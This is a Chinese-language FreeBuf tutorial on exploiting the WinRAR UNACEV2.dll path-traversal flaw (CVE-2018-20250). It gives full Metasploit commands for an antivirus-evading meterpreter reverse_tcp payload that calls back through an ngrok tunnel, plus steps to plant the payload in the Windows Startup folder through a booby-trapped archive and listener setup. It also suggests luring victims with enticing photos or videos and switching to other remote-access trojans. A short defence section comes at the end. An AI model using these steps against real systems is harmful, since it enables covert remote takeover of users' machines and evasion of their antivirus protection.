WinRAR远程代码执行漏洞结合Metasploit+Ngrok实现远程上线

前言

Windows 操作系统下知名老牌的的压缩软件“WinRAR” 被国外安全研究团队爆出严重威胁用户的安全漏洞，被发现漏洞是“WinRAR”安装目录中的一个名为“UNACEV2.dll”的动态链接库文件，该文件自 2005 年发布至今就从未有过更新过，影响时长长达十余年之久。本篇文章鄙人会使用图文+视频的教程来给各位不知道利用的小粉们讲一下，视频教程在文末尾处。

漏洞细节: https://research.checkpoint.com/extracting-code-execution-from-winrar/

影响版本

WinRAR < 5.70 Beta 1Bandizip< = 6.2.0.0好压(2345压缩) < = 5.9.8.10907360压缩< = 4.0.0.1170

准备

KaliLinux(版本随意我这里使用的版本是2019.1版本)ngrokMetasploit(KaliLinux2019.1已经集成了Metasploit5)

图文教程开始

1.1 下载WinRAR远程代码执行漏洞EXP利用文件:

https://github.com/WyAtu/CVE-2018-20250.git

1.2 打开你的浏览器打开https://www.ngrok.cc/ 有账号登录，没有账户注册登录。开通一个免费的隧道转发代理，把ngrok隧道协议设置成TCP，内网IP改成你自己的KaliLinux的内网IP，内网端口号任意填写不冲突即可。

1.3 记住如图所示红线框起来的两部分内容，后面会用到。

1.4 然后下载ngrok脚本到你的KaliLinux上面，选择”Linux 64Bit版本”保存到桌面上，运行脚本开启代理。

./sunny clientid [隧道ID]

Metasploit生成免杀Payload 载荷(针对Windows10的defender)

2.1 使用Metasploit5自带的免杀模块生成Payload

msfconsoleuse evasion/windows/windows_defender_exe(选择msf5免杀模块)show info(显示模块信息)set filename WinRarPayloadTest.exe(设置Payload名字 )set payload windows/meterpreter/reverse_tcp(设置Payload类型 )set lhost free.idcfengye.com(设置上线地址，填写Ngrok映射出去的地址即可)set lport 12352(设置监听端口，填写Ngrok映射出去的端口即可 )run(生成Payload)

(Payload的路径地址:/root/.msf4/local/WinRarPayload.exe)

2.2 把Payload移动到apache2网站根目录下

cp /root/.msf4/local/xxxxx.exe /var/www/htm

2.3 启动阿帕奇服务

service apache2 start

2.4 物理机访问KaliLinux的IP地址，下载这个Payload文件到EXP文件夹下的根目录。

2.5 打开exp.py文件把“calc.exe“修改成”WinRarPayload.exe”保存。

2.6 Python运行exp.py文件自动在文件根目录下生成恶意压缩包。

2.7 已经成功生成了恶意的压缩包，这时候你们往里面丢一些照片视频(你懂的)什么的就变成了诱人的压缩包了。

Windows7靶机下载解压这个恶意压缩包：

3.1 解压后自动在系统启动目录下自动出现我们之前生成的Payload。

Windows7系统启动目录:C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup。

Metasploit启动远程监听主机上线请求:

msfconsoleuse exploit/multi/handlerset payload windows/meterpreter/reverse_tcpset lhost 192.168.0.107set lport 8989run

确保ngrok后台在运行,然后重启Windows7靶机，metasploit监听等待上线。

视频复现教程

https://www.lanzous.com/i3a0ide 密码:FreeBuf

防御方法

1. 卸载Winrar，下载7z，安装包体积小，压缩解压速度快

2. 删除UNACEV2.dll文件

3. 不下载解压来历不明的压缩包(色字头上一把刀，手冲一时爽)

小结

evasion/windows/windowsdefenderexe这个免杀模块基本可以免杀大多杀毒软件(Windows10 Defender,火绒等等)，也可以通过Shllecode编码的方式来达到免杀的效果，条条大路通罗马。其次你也可以使用Windows平台下的其他远程RAT(Njrat，Ghost等等)来生成恶意的压缩包，Windows平台的内网穿透工具可以使用"网络通"，来达到效果。文章和视频仅用于安全教育的范畴；切勿违法使用，视频配BGM是鄙人喜好，望各位前辈多多包涵。

*本文作者：艾登——皮尔斯，本文属 FreeBuf 原创奖励计划，未经许可禁止转载。